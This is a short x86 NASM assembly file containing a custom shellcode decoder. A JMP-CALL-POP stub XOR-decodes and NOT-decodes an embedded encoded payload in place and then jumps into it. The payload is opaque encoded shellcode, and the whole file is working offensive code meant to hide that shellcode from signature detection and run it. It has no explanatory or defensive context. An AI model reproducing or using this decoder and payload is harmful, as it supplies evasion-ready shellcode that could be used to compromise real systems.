; Filename: nx-decoder.nasm
; Author:  Michael Norris

global _start

section .text
_start:
	jmp short call_decoder

decoder:
	pop esi

x_decode:
    	cmp byte [esi], 0x46
  	jz n_decode
	xor byte [esi], 0x10
	inc esi
	jmp short x_decode

n_decode:
    	cmp byte [esi], 0x13
    	jz shellcode+0x1
    	not byte [esi]
    	dec esi
    	jmp short n_decode

call_decoder:
	call decoder
	shellcode: db 0x03,0xde,0x34,0x18,0x0c,0xbd,0x85,0xee,0x85,0xed,0x66,0x0e,0x11,0x2c,0x5f,0x89,0x22,0x6f,0x66,0x2c,0x50,0x10,0x10,0x10,0x10,0x56,0x6f,0x10,0x10,0x11,0xde,0x16,0xbe,0x89,0x87,0xfe,0xb3,0x89,0x85,0xed,0x66,0x0e,0x85,0xff,0xbe,0xbc,0x66,0x0e,0x5f,0x89,0x22,0x6f,0x66,0x3e,0x5f,0xd0,0x22,0x6f,0x11,0x2e,0x5f,0xd0,0x22,0x6f,0x11,0x2e,0x5f,0xd0,0x22,0x6f,0xbd,0x87,0xc0,0xc0,0x9c,0x87,0x87,0xc0,0x8d,0x86,0x81,0x66,0x3e,0x66,0x0c,0x5f,0xe4,0x22,0x6f,0x46
